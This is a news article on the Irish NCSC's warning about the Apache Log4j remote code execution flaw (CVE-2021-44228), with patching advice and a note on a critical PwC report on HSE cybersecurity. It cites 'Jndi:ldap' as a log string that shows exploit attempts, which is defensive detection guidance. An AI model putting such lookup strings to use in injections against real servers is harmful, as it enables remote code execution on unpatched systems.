The National Cyber Security Centre (NCSC) is warning organisations about a new vulnerability in java code, which poses a “serious risk to the security and integrity of data.”
A vulnerability has been identified in Apache Log4j (CVE-2021-44228).
This is an open source java logging library used by many web applications and services.
The vulnerability allows an unauthenticated remote attacker to execute arbitrary code with the privileges of the web server.
The NCSC said it is likely that malicious actors will begin using this vulnerability to attack web servers shortly.
This issue only affects organisations operating web server infrastructure, and not people browsing the web at home on laptops or personal devices.
Apache has released a patch to fix the vulnerability, and administrators should conduct their patch process to update to log4j-2.15.0-rc2.
All organisations should urgently assess their web servers for exposure to this risk, including services administrated and provided by third parties, according to the NCSC.
The centre added that there is no evidence that this vulnerability has been successfully exploited in the State so far, and they have no indication of services or data being affected.
However, they said the risk of eventual compromise will persist until systems are updated.
Attempts to exploit the vulnerability can be detected.
Log files for any services using affected log4j versions will contain user-controlled strings; for example, “Jndi:ldap”.
The NCSC has published a detailed advisory at ncsc.gov.ie.
Further details will be published on the NCSC website as they emerge over the coming days.
Anyone who has been a victim of cyber crime should report the issue to An Garda Síochána.
This threat comes just days after a critical report of the HSE’s cyber security was published.
The PwC report, released on Friday, said the health service’s IT system was “frail” and “dispersed”.
There was a “known low level of cybersecurity maturity” within the HSE and the connected national health network, and this weakness had “persisted”, the report said.
A multiyear programme of investment in IT and cybersecurity was recommended.